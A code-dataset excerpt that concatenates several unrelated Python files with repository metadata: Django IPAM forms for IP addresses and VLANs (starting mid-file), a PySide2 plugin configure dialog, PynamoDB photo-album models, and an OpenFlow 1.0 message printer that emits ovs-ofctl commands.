self.fields['interface'].choices = []
# Initialize primary_for_parent if IP address is already assigned
if self.instance.pk and self.instance.interface is not None:
parent = self.instance.interface.parent
if (
self.instance.address.version == 4 and parent.primary_ip4_id == self.instance.pk or
self.instance.address.version == 6 and parent.primary_ip6_id == self.instance.pk
):
self.initial['primary_for_parent'] = True
def clean(self):
super(IPAddressForm, self).clean()
# Primary IP assignment is only available if an interface has been assigned.
if self.cleaned_data.get('primary_for_parent') and not self.cleaned_data.get('interface'):
self.add_error(
'primary_for_parent', "Only IP addresses assigned to an interface can be designated as primary IPs."
)
def save(self, *args, **kwargs):
ipaddress = super(IPAddressForm, self).save(*args, **kwargs)
# Assign/clear this IPAddress as the primary for the associated Device/VirtualMachine.
if self.cleaned_data['primary_for_parent']:
parent = self.cleaned_data['interface'].parent
if ipaddress.address.version == 4:
parent.primary_ip4 = ipaddress
else:
parent.primary_ip6 = ipaddress
parent.save()
elif self.cleaned_data['interface']:
parent = self.cleaned_data['interface'].parent
if ipaddress.address.version == 4 and parent.primary_ip4 == ipaddress:
parent.primary_ip4 = None
parent.save()
elif ipaddress.address.version == 6 and parent.primary_ip6 == ipaddress:
parent.primary_ip6 = None
parent.save()
return ipaddress
class IPAddressBulkCreateForm(BootstrapMixin, forms.Form):
pattern = ExpandableIPAddressField(label='Address pattern')
class IPAddressBulkAddForm(BootstrapMixin, TenancyForm, CustomFieldForm):
class Meta:
model = IPAddress
fields = ['address', 'vrf', 'status', 'role', 'description', 'tenant_group', 'tenant']
def __init__(self, *args, **kwargs):
super(IPAddressBulkAddForm, self).__init__(*args, **kwargs)
self.fields['vrf'].empty_label = 'Global'
class IPAddressCSVForm(forms.ModelForm):
vrf = forms.ModelChoiceField(
queryset=VRF.objects.all(),
required=False,
to_field_name='rd',
help_text='Route distinguisher of the assigned VRF',
error_messages={
'invalid_choice': 'VRF not found.',
}
)
tenant = forms.ModelChoiceField(
queryset=Tenant.objects.all(),
to_field_name='name',
required=False,
help_text='Name of the assigned tenant',
error_messages={
'invalid_choice': 'Tenant not found.',
}
)
status = CSVChoiceField(
choices=IPADDRESS_STATUS_CHOICES,
help_text='Operational status'
)
role = CSVChoiceField(
choices=IPADDRESS_ROLE_CHOICES,
required=False,
help_text='Functional role'
)
device = FlexibleModelChoiceField(
queryset=Device.objects.all(),
required=False,
to_field_name='name',
help_text='Name or ID of assigned device',
error_messages={
'invalid_choice': 'Device not found.',
}
)
virtual_machine = forms.ModelChoiceField(
queryset=VirtualMachine.objects.all(),
required=False,
to_field_name='name',
help_text='Name of assigned virtual machine',
error_messages={
'invalid_choice': 'Virtual machine not found.',
}
)
interface_name = forms.CharField(
help_text='Name of assigned interface',
required=False
)
is_primary = forms.BooleanField(
help_text='Make this the primary IP for the assigned device',
required=False
)
class Meta:
model = IPAddress
fields = IPAddress.csv_headers
def clean(self):
super(IPAddressCSVForm, self).clean()
device = self.cleaned_data.get('device')
virtual_machine = self.cleaned_data.get('virtual_machine')
interface_name = self.cleaned_data.get('interface_name')
is_primary = self.cleaned_data.get('is_primary')
# Validate interface
if interface_name and device:
try:
self.instance.interface = Interface.objects.get(device=device, name=interface_name)
except Interface.DoesNotExist:
raise forms.ValidationError("Invalid interface {} for device {}".format(
interface_name, device
))
elif interface_name and virtual_machine:
try:
self.instance.interface = Interface.objects.get(virtual_machine=virtual_machine, name=interface_name)
except Interface.DoesNotExist:
raise forms.ValidationError("Invalid interface {} for virtual machine {}".format(
interface_name, virtual_machine
))
elif interface_name:
raise forms.ValidationError("Interface given ({}) but parent device/virtual machine not specified".format(
interface_name
))
elif device:
raise forms.ValidationError("Device specified ({}) but interface missing".format(device))
elif virtual_machine:
raise forms.ValidationError("Virtual machine specified ({}) but interface missing".format(virtual_machine))
# Validate is_primary
if is_primary and not device and not virtual_machine:
raise forms.ValidationError("No device or virtual machine specified; cannot set as primary IP")
def save(self, *args, **kwargs):
# Set interface
if self.cleaned_data['device'] and self.cleaned_data['interface_name']:
self.instance.interface = Interface.objects.get(
device=self.cleaned_data['device'],
name=self.cleaned_data['interface_name']
)
elif self.cleaned_data['virtual_machine'] and self.cleaned_data['interface_name']:
self.instance.interface = Interface.objects.get(
virtual_machine=self.cleaned_data['virtual_machine'],
name=self.cleaned_data['interface_name']
)
ipaddress = super(IPAddressCSVForm, self).save(*args, **kwargs)
# Set as primary for device/VM
if self.cleaned_data['is_primary']:
parent = self.cleaned_data['device'] or self.cleaned_data['virtual_machine']
if self.instance.address.version == 4:
parent.primary_ip4 = ipaddress
elif self.instance.address.version == 6:
parent.primary_ip6 = ipaddress
parent.save()
return ipaddress
class IPAddressBulkEditForm(BootstrapMixin, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(queryset=IPAddress.objects.all(), widget=forms.MultipleHiddenInput)
vrf = forms.ModelChoiceField(queryset=VRF.objects.all(), required=False, label='VRF')
tenant = forms.ModelChoiceField(queryset=Tenant.objects.all(), required=False)
status = forms.ChoiceField(choices=add_blank_choice(IPADDRESS_STATUS_CHOICES), required=False)
role = forms.ChoiceField(choices=add_blank_choice(IPADDRESS_ROLE_CHOICES), required=False)
description = forms.CharField(max_length=100, required=False)
class Meta:
nullable_fields = ['vrf', 'role', 'tenant', 'description']
class IPAddressAssignForm(BootstrapMixin, forms.Form):
vrf = forms.ModelChoiceField(queryset=VRF.objects.all(), required=False, label='VRF', empty_label='Global')
address = forms.CharField(label='IP Address')
class IPAddressFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = IPAddress
q = forms.CharField(required=False, label='Search')
parent = forms.CharField(required=False, label='Parent Prefix', widget=forms.TextInput(attrs={
'placeholder': 'Prefix',
}))
family = forms.ChoiceField(required=False, choices=IP_FAMILY_CHOICES, label='Address family')
mask_length = forms.ChoiceField(required=False, choices=IPADDRESS_MASK_LENGTH_CHOICES, label='Mask length')
vrf = FilterChoiceField(
queryset=VRF.objects.annotate(filter_count=Count('ip_addresses')),
to_field_name='rd',
label='VRF',
null_label='-- Global --'
)
tenant = FilterChoiceField(
queryset=Tenant.objects.annotate(filter_count=Count('ip_addresses')),
to_field_name='slug',
null_label='-- None --'
)
status = AnnotatedMultipleChoiceField(
choices=IPADDRESS_STATUS_CHOICES,
annotate=IPAddress.objects.all(),
annotate_field='status',
required=False
)
role = AnnotatedMultipleChoiceField(
choices=IPADDRESS_ROLE_CHOICES,
annotate=IPAddress.objects.all(),
annotate_field='role',
required=False
)
#
# VLAN groups
#
class VLANGroupForm(BootstrapMixin, forms.ModelForm):
slug = SlugField()
class Meta:
model = VLANGroup
fields = ['site', 'name', 'slug']
class VLANGroupCSVForm(forms.ModelForm):
site = forms.ModelChoiceField(
queryset=Site.objects.all(),
required=False,
to_field_name='name',
help_text='Name of parent site',
error_messages={
'invalid_choice': 'Site not found.',
}
)
slug = SlugField()
class Meta:
model = VLANGroup
fields = VLANGroup.csv_headers
help_texts = {
'name': 'Name of VLAN group',
}
class VLANGroupFilterForm(BootstrapMixin, forms.Form):
site = FilterChoiceField(
queryset=Site.objects.annotate(filter_count=Count('vlan_groups')),
to_field_name='slug',
null_label='-- Global --'
)
#
# VLANs
#
class VLANForm(BootstrapMixin, TenancyForm, CustomFieldForm):
site = forms.ModelChoiceField(
queryset=Site.objects.all(),
required=False,
widget=forms.Select(
attrs={'filter-for': 'group', 'nullable': 'true'}
)
)
group = ChainedModelChoiceField(
queryset=VLANGroup.objects.all(),
chains=(
('site', 'site'),
),
required=False,
label='Group',
widget=APISelect(
api_url='/api/ipam/vlan-groups/?site_id={{site}}',
)
)
class Meta:
model = VLAN
fields = ['site', 'group', 'vid', 'name', 'status', 'role', 'description', 'tenant_group', 'tenant']
help_texts = {
'site': "Leave blank if this VLAN spans multiple sites",
'group': "VLAN group (optional)",
'vid': "Configured VLAN ID",
'name': "Configured VLAN name",
'status': "Operational status of this VLAN",
'role': "The primary function of this VLAN",
}
class VLANCSVForm(forms.ModelForm):
site = forms.ModelChoiceField(
queryset=Site.objects.all(),
required=False,
to_field_name='name',
help_text='Name of parent site',
error_messages={
'invalid_choice': 'Site not found.',
}
)
group_name = forms.CharField(
help_text='Name of VLAN group',
required=False
)
tenant = forms.ModelChoiceField(
queryset=Tenant.objects.all(),
to_field_name='name',
required=False,
help_text='Name of assigned tenant',
error_messages={
'invalid_choice': 'Tenant not found.',
}
)
status = CSVChoiceField(
choices=VLAN_STATUS_CHOICES,
help_text='Operational status'
)
role = forms.ModelChoiceField(
queryset=Role.objects.all(),
required=False,
to_field_name='name',
help_text='Functional role',
error_messages={
'invalid_choice': 'Invalid role.',
}
)
class Meta:
model = VLAN
fields = VLAN.csv_headers
help_texts = {
'vid': 'Numeric VLAN ID (1-4095)',
'name': 'VLAN name',
}
def clean(self):
super(VLANCSVForm, self).clean()
site = self.cleaned_data.get('site')
group_name = self.cleaned_data.get('group_name')
# Validate VLAN group
if group_name:
try:
self.instance.group = VLANGroup.objects.get(site=site, name=group_name)
except VLANGroup.DoesNotExist:
if site:
raise forms.ValidationError("VLAN group {} not found for site {}".format(group_name, site))
else:
raise forms.ValidationError("Global VLAN group {} not found".format(group_name))
class VLANBulkEditForm(BootstrapMixin, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(queryset=VLAN.objects.all(), widget=forms.MultipleHiddenInput)
site = forms.ModelChoiceField(queryset=Site.objects.all(), required=False)
group = forms.ModelChoiceField(queryset=VLANGroup.objects.all(), required=False)
tenant = forms.ModelChoiceField(queryset=Tenant.objects.all(), required=False)
status = forms.ChoiceField(choices=add_blank_choice(VLAN_STATUS_CHOICES), required=False)
role = forms.ModelChoiceField(queryset=Role.objects.all(), required=False)
description = forms.CharField(max_length=100, required=False)
class Meta:
nullable_fields = ['site', 'group', 'tenant', 'role', 'description']
class VLANFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = VLAN
q = forms.CharField(required=False, label='Search')
site = FilterChoiceField(
queryset=Site.objects.annotate(filter_count=Count('vlans')),
to_field_name='slug',
null_label='-- Global --'
)
group_id = FilterChoiceField(
queryset=VLANGroup.objects.annotate(filter_count=Count('vlans')),
label='VLAN group',
null_label='-- None --'
)
tenant = FilterChoiceField(
queryset=Tenant.objects.annotate(filter_count=Count('vlans')),
to_field_name='slug',
null_label='-- None --'
)
status = AnnotatedMultipleChoiceField(
choices=VLAN_STATUS_CHOICES,
annotate=VLAN.objects.all(),
annotate_field='status',
required=False
)
role = FilterChoiceField(
queryset=Role.objects.annotate(filter_count=Count('vlans')),
to_field_name='slug',
null_label='-- None --'
)
#
# Services
#
class ServiceForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = Service
fields = ['name', 'protocol', 'port', 'ipaddresses', 'description']
help_texts = {
'ipaddresses': "IP address assignment is optional. If no IPs are selected, the service is assumed to be "
"reachable via all IPs assigned to the device.",
}
def __init__(self, *args, **kwargs):
super(ServiceForm, self).__init__(*args, **kwargs)
# Limit IP address choices to those assigned to interfaces of the parent device/VM
if self.instance.device:
vc_interface_ids = [i['id'] for i in self.instance.device.vc_interfaces.values('id')]
self.fields['ipaddresses'].queryset = IPAddress.objects.filter(
interface_id__in=vc_interface_ids
)
elif self.instance.virtual_machine:
self.fields['ipaddresses'].queryset = IPAddress.objects.filter(
interface__virtual_machine=self.instance.virtual_machine
)
else:
self.fields['ipaddresses'].choices = []
| 33.603854
| 120
| 0.626744
|
f9b24fe274b0d4531023af207e705d1f30d6e0b9
| 3,445
|
py
|
Python
|
mapclientplugins/simulationtask3step/configuredialog.py
|
tsalemink/mapclientplugins.simulationtask3step
|
09ee208b3b9bca28518b59bb06833ca3f23cb391
|
[
"Apache-2.0"
] | null | null | null |
mapclientplugins/simulationtask3step/configuredialog.py
|
tsalemink/mapclientplugins.simulationtask3step
|
09ee208b3b9bca28518b59bb06833ca3f23cb391
|
[
"Apache-2.0"
] | null | null | null |
mapclientplugins/simulationtask3step/configuredialog.py
|
tsalemink/mapclientplugins.simulationtask3step
|
09ee208b3b9bca28518b59bb06833ca3f23cb391
|
[
"Apache-2.0"
] | 1
|
2021-06-10T03:39:25.000Z
|
2021-06-10T03:39:25.000Z
|
from PySide2 import QtWidgets
from mapclientplugins.simulationtask3step.ui_configuredialog import Ui_ConfigureDialog
INVALID_STYLE_SHEET = 'background-color: rgba(239, 0, 0, 50)'
DEFAULT_STYLE_SHEET = ''
class ConfigureDialog(QtWidgets.QDialog):
'''
Configure dialog to present the user with the options to configure this step.
'''
def __init__(self, parent=None):
'''
Constructor
'''
QtWidgets.QDialog.__init__(self, parent)
self._ui = Ui_ConfigureDialog()
self._ui.setupUi(self)
# Keep track of the previous identifier so that we can track changes
# and know how many occurrences of the current identifier there should
# be.
self._previousIdentifier = ''
# Set a place holder for a callable that will get set from the step.
# We will use this method to decide whether the identifier is unique.
self.identifierOccursCount = None
self._makeConnections()
def _makeConnections(self):
self._ui.lineEdit0.textChanged.connect(self.validate)
def accept(self):
'''
Override the accept method so that we can confirm saving an
invalid configuration.
'''
result = QtWidgets.QMessageBox.Yes
if not self.validate():
result = QtWidgets.QMessageBox.warning(self, 'Invalid Configuration',
                'This configuration is invalid. Unpredictable behaviour may result if you choose \'Yes\'. Are you sure you want to save this configuration?',
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,
QtWidgets.QMessageBox.No)
if result == QtWidgets.QMessageBox.Yes:
QtWidgets.QDialog.accept(self)
def validate(self):
'''
Validate the configuration dialog fields. For any field that is not valid
set the style sheet to the INVALID_STYLE_SHEET. Return the outcome of the
overall validity of the configuration.
'''
# Determine if the current identifier is unique throughout the workflow
# The identifierOccursCount method is part of the interface to the workflow framework.
value = self.identifierOccursCount(self._ui.lineEdit0.text())
valid = (value == 0) or (value == 1 and self._previousIdentifier == self._ui.lineEdit0.text())
if valid:
self._ui.lineEdit0.setStyleSheet(DEFAULT_STYLE_SHEET)
else:
self._ui.lineEdit0.setStyleSheet(INVALID_STYLE_SHEET)
return valid
def getConfig(self):
'''
Get the current value of the configuration from the dialog. Also
set the _previousIdentifier value so that we can check uniqueness of the
identifier over the whole of the workflow.
'''
self._previousIdentifier = self._ui.lineEdit0.text()
config = {}
config['identifier'] = self._ui.lineEdit0.text()
return config
def setConfig(self, config):
'''
Set the current value of the configuration for the dialog. Also
set the _previousIdentifier value so that we can check uniqueness of the
identifier over the whole of the workflow.
'''
self._previousIdentifier = config['identifier']
self._ui.lineEdit0.setText(config['identifier'])
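# Illustrative wiring (names below are hypothetical): the owning step injects the
# uniqueness check before showing the dialog, e.g.
#   dlg = ConfigureDialog()
#   dlg.identifierOccursCount = workflow_identifier_count  # hypothetical callable
#   dlg.setConfig(current_config)
#   if dlg.exec_():
#       current_config = dlg.getConfig()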
| 40.05814
| 194
| 0.64209
|
696ade976ba0e2e884c3463b018c1b1ee4501659
| 3,592
|
py
|
Python
|
LAB03/01-DDB/backend/cloudalbum/database/model_ddb.py
|
liks79/moving-to-serverless-renew
|
2f173071ab387654d4cc851a0b39130613906378
|
[
"MIT"
] | 6
|
2019-08-21T04:13:34.000Z
|
2019-10-29T07:15:39.000Z
|
LAB03/01-DDB/backend/cloudalbum/database/model_ddb.py
|
liks79/moving-to-serverless-renew
|
2f173071ab387654d4cc851a0b39130613906378
|
[
"MIT"
] | 89
|
2019-07-31T02:29:54.000Z
|
2022-03-12T01:03:22.000Z
|
LAB03/01-DDB/backend/cloudalbum/database/model_ddb.py
|
michaelrishiforrester/moving-to-serverless-renew
|
27cbcbde9db3d2bc66212fe4f768563d25f64c19
|
[
"MIT"
] | 4
|
2019-08-02T03:00:35.000Z
|
2020-02-26T18:44:03.000Z
|
"""
cloudalbum/database/model_ddb.py
~~~~~~~~~~~~~~~~~~~~~~~
Application data model defined here.
:description: CloudAlbum is a fully featured sample application for 'Moving to AWS serverless' training course
:copyright: © 2019 written by Dayoungle Jun, Sungshik Jou.
:license: MIT, see LICENSE for more details.
"""
import json
from datetime import datetime
from pynamodb.models import Model
from pynamodb.attributes import UnicodeAttribute, NumberAttribute, UTCDateTimeAttribute, ListAttribute, MapAttribute
from pynamodb.indexes import GlobalSecondaryIndex, IncludeProjection
from tzlocal import get_localzone
from boto3.session import Session
from os import environ
AWS_REGION = Session().region_name if environ.get('AWS_REGION') is None else environ.get('AWS_REGION')
class EmailIndex(GlobalSecondaryIndex):
"""
This class represents a global secondary index
"""
class Meta:
index_name = 'user-email-index'
read_capacity_units = 5
write_capacity_units = 5
projection = IncludeProjection(['password'])
# This attribute is the hash key for the index
# Note that this attribute must also exist
# in the model
email = UnicodeAttribute(hash_key=True)
class User(Model):
"""
User table for DynamoDB
"""
class Meta:
table_name = 'User'
region = AWS_REGION
id = UnicodeAttribute(hash_key=True)
email_index = EmailIndex()
email = UnicodeAttribute(null=False)
username = UnicodeAttribute(null=False)
password = UnicodeAttribute(null=False)
class Photo(Model):
"""
Photo table for DynamoDB
"""
class Meta:
table_name = 'Photo'
region = AWS_REGION
user_id = UnicodeAttribute(hash_key=True)
id = UnicodeAttribute(range_key=True)
tags = UnicodeAttribute(null=True)
desc = UnicodeAttribute(null=True)
filename_orig = UnicodeAttribute(null=True)
filename = UnicodeAttribute(null=True)
filesize = NumberAttribute(null=True)
geotag_lat = UnicodeAttribute(null=True)
geotag_lng = UnicodeAttribute(null=True)
    # default is a callable so the timestamp is taken at item creation, not at import time
    upload_date = UTCDateTimeAttribute(default=lambda: datetime.now(get_localzone()))
taken_date = UTCDateTimeAttribute(null=True)
make = UnicodeAttribute(null=True)
model = UnicodeAttribute(null=True)
width = UnicodeAttribute(null=True)
height = UnicodeAttribute(null=True)
city = UnicodeAttribute(null=True)
nation = UnicodeAttribute(null=True)
address = UnicodeAttribute(null=True)
class ModelEncoder(json.JSONEncoder):
def default(self, obj):
if hasattr(obj, 'attribute_values'):
return obj.attribute_values
elif isinstance(obj, datetime):
return obj.isoformat()
return json.JSONEncoder.default(self, obj)
def photo_deserialize(photo):
photo_json = {}
photo_json['id'] = photo.id
photo_json['filename'] = photo.filename
photo_json['filename_orig'] = photo.filename_orig
photo_json['filesize'] = photo.filesize
photo_json['upload_date'] = photo.upload_date
photo_json['tags'] = photo.tags
photo_json['desc'] = photo.desc
photo_json['geotag_lat'] = photo.geotag_lat
photo_json['geotag_lng'] = photo.geotag_lng
photo_json['taken_date'] = photo.taken_date
photo_json['make'] = photo.make
photo_json['model'] = photo.model
photo_json['width'] = photo.width
photo_json['height'] = photo.height
photo_json['city'] = photo.city
photo_json['nation'] = photo.nation
photo_json['address'] = photo.address
return photo_json
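# Minimal usage sketch (identifiers and values are illustrative): the email GSI lets
# the application look a user up without the hash key, and photos are queried per user:
#   for user in User.email_index.query('someone@example.com'):
#       print(user.id, user.username)
#   for photo in Photo.query('some-user-id'):
#       print(json.dumps(photo_deserialize(photo), cls=ModelEncoder))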
| 30.700855
| 116
| 0.703786
|
9a958049a294a8b4708c3b62711abc41e4d1d30d
| 22,879
|
py
|
Python
|
of10/prints.py
|
palco003/ofp_sniffer
|
5b45db14187aae6adf7b1db96e36457703e2f884
|
[
"Apache-2.0"
] | null | null | null |
of10/prints.py
|
palco003/ofp_sniffer
|
5b45db14187aae6adf7b1db96e36457703e2f884
|
[
"Apache-2.0"
] | null | null | null |
of10/prints.py
|
palco003/ofp_sniffer
|
5b45db14187aae6adf7b1db96e36457703e2f884
|
[
"Apache-2.0"
] | null | null | null |
"""
Prints for OpenFlow 1.0 only
"""
from hexdump import hexdump
import of10.dissector
import of10.parser
import tcpiplib.prints
import tcpiplib.tcpip
from gen.prints import red, green
from tcpiplib.prints import eth_addr, datapath_id
import tcpiplib.prints
import gen.cli
def print_type_unknown(pkt):
string = 'OpenFlow OFP_Type %s unknown \n'
print string % (pkt.of_h['type'])
def print_pad(pad):
"""
Used to print pads as a sequence of 0s: 0, 00, 000..
Args:
pad: pad in str format
Returns: string with '0'
"""
pad_len = len(pad)
string = '0'
if pad_len == 1:
return '0'
for item in range(0,pad_len-1):
string += '0'
return string
def print_of_hello(msg):
print 'OpenFlow Hello'
def print_of_error(msg):
nCode, tCode = of10.dissector.get_ofp_error(msg.type, msg.code)
print ('OpenFlow Error - Type: %s Code: %s' % (red(nCode), red(tCode)))
hexdump(msg.data)
def print_of_feature_req(msg):
print 'OpenFlow Feature Request'
def print_of_getconfig_req(msg):
print 'OpenFlow GetConfig Request'
def print_of_feature_res(msg):
dpid = datapath_id(msg.datapath_id)
print ('FeatureRes - datapath_id: %s n_buffers: %s n_tbls: %s, pad: %s'
% (green(dpid), msg.n_buffers, msg.n_tbls, print_pad(msg.pad)))
print ('FeatureRes - Capabilities:'),
for i in msg.capabilities:
print of10.dissector.get_feature_res_capabilities(i),
print
print ('FeatureRes - Actions:'),
for i in msg.actions:
print of10.dissector.get_feature_res_actions(i),
print
print_of_ports(msg.ports)
def _dont_print_0(printed):
if printed is False:
print '0',
return False
def print_port_field(port_id, variable, name):
port_id = '%s' % green(port_id)
printed = False
print ('Port_id: %s - %s:' % (port_id, name)),
for i in variable:
print of10.dissector.get_phy_feature(i),
printed = True
else:
printed = _dont_print_0(printed)
print
def print_ofp_phy_port(port):
port_id = '%s' % green(port.port_id)
print ('Port_id: %s - hw_addr: %s name: %s' % (
port_id, green(port.hw_addr), green(port.name)))
print ('Port_id: %s - config:' % port_id),
printed = False
for i in port.config:
print of10.dissector.get_phy_config(i),
printed = True
else:
printed = _dont_print_0(printed)
print
print ('Port_id: %s - state:' % port_id),
for i in port.state:
print of10.dissector.get_phy_state(i),
printed = True
else:
printed = _dont_print_0(printed)
print
# TODO: fix it
print_port_field(port_id, port.curr, 'curr')
print_port_field(port_id, port.advertised, 'advertised')
print_port_field(port_id, port.supported, 'supported')
print_port_field(port_id, port.peer, 'peer')
def print_of_ports(ports):
if type(ports) is not list:
print_ofp_phy_port(ports)
else:
for port in ports:
print_ofp_phy_port(port)
def print_ofp_match(match):
print 'Match -',
# Collect all variables from class ofp_match
# print those that are not 'None'
for match_item in match.__dict__:
match_item_value = match.__dict__[match_item]
if match_item_value is not None:
            if match_item == 'dl_vlan':
                match_item_value = of10.dissector.get_vlan(match_item_value)
            elif match_item == 'wildcards':
                match_item_value = hex(match_item_value)
            elif match_item == 'dl_type':
match_item_value = tcpiplib.tcpip.get_ethertype(match_item_value)
print ("%s: %s" % (match_item, green(match_item_value))),
print
def print_ofp_body(msg):
string = ('Body - Cookie: %s Command: %s Idle/Hard Timeouts: '
'%s/%s\nBody - Priority: %s Buffer ID: %s Out Port: %s Flags: %s')
command = green(of10.dissector.get_ofp_command(msg.command))
flags = green(of10.dissector.get_ofp_flags(msg.flags))
out_port = green(of10.dissector.get_phy_port_id(msg.out_port))
print string % (msg.cookie, command, msg.idle_timeout, msg.hard_timeout,
green(msg.priority), msg.buffer_id, out_port, flags)
def print_ofp_flow_removed(msg):
print_ofp_match(msg.match)
string = ('Body - Cookie: %s Priority: %s Reason: %s Pad: %s\nBody - '
'Duration Secs/NSecs: %s/%s Idle Timeout: %s Pad2/Pad3: %s/%s'
' Packet Count: %s Byte Count: %s')
print string % (msg.cookie, msg.priority, red(msg.reason),
print_pad(msg.pad), msg.duration_sec, msg.duration_nsec,
msg.idle_timeout, print_pad(msg.pad2),
print_pad(msg.pad3), msg.packet_count, msg.byte_count)
def print_actions(actions):
for action in actions:
print_ofp_action(action.type, action.length, action.payload)
def print_ofp_action(action_type, length, payload):
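    # Dispatch on the OpenFlow 1.0 action type (0 = OUTPUT, 1 = SET_VLAN_VID, ...,
    # 0xffff = VENDOR): each branch prints a human-readable line and returns the
    # equivalent ovs-ofctl style action string.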
if action_type == 0:
port, max_len = of10.parser.get_action(action_type, payload)
port = of10.dissector.get_phy_port_id(port)
print ('Action - Type: %s Length: %s Port: %s '
'Max Length: %s' %
(green('OUTPUT'), length, green(port), max_len))
return 'output:' + port
elif action_type == 1:
vlan, pad = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s VLAN ID: %s Pad: %s' %
(green('SetVLANID'), length, green(str(vlan)), print_pad(pad)))
return 'mod_vlan_vid:' + str(vlan)
elif action_type == 2:
vlan_pc, pad = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s VLAN PCP: %s Pad: %s' %
(green('SetVLANPCP'), length, green(str(vlan_pc)), print_pad(pad)))
return 'mod_vlan_pcp:' + str(vlan_pc)
elif action_type == 3:
print ('Action - Type: %s Length: %s' %
(green('StripVLAN'), length))
return 'strip_vlan'
elif action_type == 4:
setDLSrc, pad = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s SetDLSrc: %s Pad: %s' %
(green('SetDLSrc'), length, green(str(eth_addr(setDLSrc))),
print_pad(pad)))
return 'mod_dl_src:' + str(eth_addr(setDLSrc))
elif action_type == 5:
setDLDst, pad = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s SetDLDst: %s Pad: %s' %
(green('SetDLDst'), length, green(str(eth_addr(setDLDst))),
print_pad(pad)))
return 'mod_dl_dst:' + str(eth_addr(setDLDst))
elif action_type == 6:
nw_addr = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s SetNWSrc: %s' %
(green('SetNWSrc'), length, green(str(nw_addr))))
return 'mod_nw_src:' + str(nw_addr)
elif action_type == 7:
nw_addr = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s SetNWDst: %s' %
(green('SetNWDst'), length, green(str(nw_addr))))
        return 'mod_nw_dst:' + str(nw_addr)
elif action_type == 8:
nw_tos, pad = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s SetNWTos: %s Pad: %s' %
(green('SetNWTos'), length, green(str(nw_tos)), print_pad(pad)))
return 'mod_nw_tos:' + str(nw_tos)
elif action_type == 9:
port, pad = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s SetTPSrc: %s Pad: %s' %
(green('SetTPSrc'), length, green(str(port)), print_pad(pad)))
return 'mod_tp_src:' + str(port)
elif action_type == int('a', 16):
port, pad = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s SetTPDst: %s Pad: %s' %
(green('SetTPDst'), length, green(str(port)), print_pad(pad)))
return 'mod_tp_dst:' + str(port)
elif action_type == int('b', 16):
port, pad, queue_id = of10.parser.get_action(action_type, payload)
print (('Action - Type: %s Length: %s Enqueue: %s Pad: %s'
' Queue: %s') %
(green('Enqueue'), length, green(str(port)), print_pad(pad),
green(str(queue_id))))
return 'set_queue:' + str(queue_id)
elif action_type == int('ffff', 16):
vendor = of10.parser.get_action(action_type, payload)
print ('Action - Type: %s Length: %s Vendor: %s' %
(green('VENDOR'), length, green(str(vendor))))
return 'VendorType'
else:
return 'Error'
def get_command(command):
commands = {0: 'add-flow', 1: 'mod-flows', 3: 'del-flows'}
try:
return commands[command]
except KeyError:
return 0
def get_flag(flag):
flags = {0: '', 1: 'send_flow_rem', 2: 'check_overlap', 3: 'Emerg'}
try:
return flags[flag]
except KeyError:
return 0
def get_actions(action_type, action_length, payload):
if action_type == 0:
port, max_len = of10.parser.get_action(action_type, payload)
return 'output:%s' % (port if port != 65533 else 'CONTROLLER')
elif action_type == 1:
vlan, pad = of10.parser.get_action(action_type, payload)
return 'mod_vlan_vid:' + str(vlan)
elif action_type == 2:
vlan_pc, pad = of10.parser.get_action(action_type, payload)
return 'mod_vlan_pcp:' + str(vlan_pc)
elif action_type == 3:
return 'strip_vlan'
elif action_type == 4:
setDLSrc, pad = of10.parser.get_action(action_type, payload)
return 'mod_dl_src:' + str(eth_addr(setDLSrc))
elif action_type == 5:
setDLDst, pad = of10.parser.get_action(action_type, payload)
return 'mod_dl_dst:' + str(eth_addr(setDLDst))
elif action_type == 6:
nw_addr = of10.parser.get_action(action_type, payload)
return 'mod_nw_src:' + str(nw_addr)
elif action_type == 7:
nw_addr = of10.parser.get_action(action_type, payload)
        return 'mod_nw_dst:' + str(nw_addr)
elif action_type == 8:
nw_tos, pad = of10.parser.get_action(action_type, payload)
return 'mod_nw_tos:' + str(nw_tos)
elif action_type == 9:
port, pad = of10.parser.get_action(action_type, payload)
return 'mod_tp_src:' + str(port)
elif action_type == int('a', 16):
port, pad = of10.parser.get_action(action_type, payload)
return 'mod_tp_dst:' + str(port)
elif action_type == int('b', 16):
port, pad, queue_id = of10.parser.get_action(action_type, payload)
return 'set_queue:' + str(queue_id)
def print_ofp_ovs(msg):
'''
If -o or --print-ovs is provided by user, print a ovs-ofctl add-dump
'''
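    # Illustrative output only (values below are made up, not taken from a capture);
    # a FlowMod with priority=100, in_port=1 and an output:2 action prints roughly:
    #   ovs-ofctl add-flow tcp:SWITCH_IP:6634 " priority=100, in_port=1,  action=output:2,"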
if gen.cli.print_ovs is not True:
return
switch_ip = 'SWITCH_IP'
switch_port = '6634'
ofm = []
ofactions = []
ovs_command = get_command(msg.command)
for K in msg.match.__dict__:
if K != 'wildcards':
if msg.match.__dict__[K] is not None:
value = "%s=%s," % (K, msg.match.__dict__[K])
ofm.append(value)
matches = ''.join(ofm)
    if msg.command != 3:
for action in msg.actions:
value = get_actions(action.type, action.length, action.payload)
value = "%s," % (value)
ofactions.append(value)
flag = get_flag(msg.flags)
print('ovs-ofctl %s tcp:%s:%s \"' % (ovs_command, switch_ip, switch_port)),
if msg.flags != 0:
print('%s,' % flag),
        if msg.priority != 32768:  # 0x8000 is the default priority
print('priority=%s,' % msg.priority),
if msg.idle_timeout != 0:
print('idle_timeout=%s,' % msg.idle_timeout),
if msg.hard_timeout != 0:
print('hard_timeout=%s,' % msg.hard_timeout),
print('%s ' % matches),
print('action=%s\"' % ''.join(ofactions))
else:
ovs_msg_del = 'ovs-ofctl %s tcp:%s:%s %s '
print(ovs_msg_del % (ovs_command, switch_ip, switch_port, matches))
def print_of_FlowMod(msg):
print_ofp_match(msg.match)
print_ofp_body(msg)
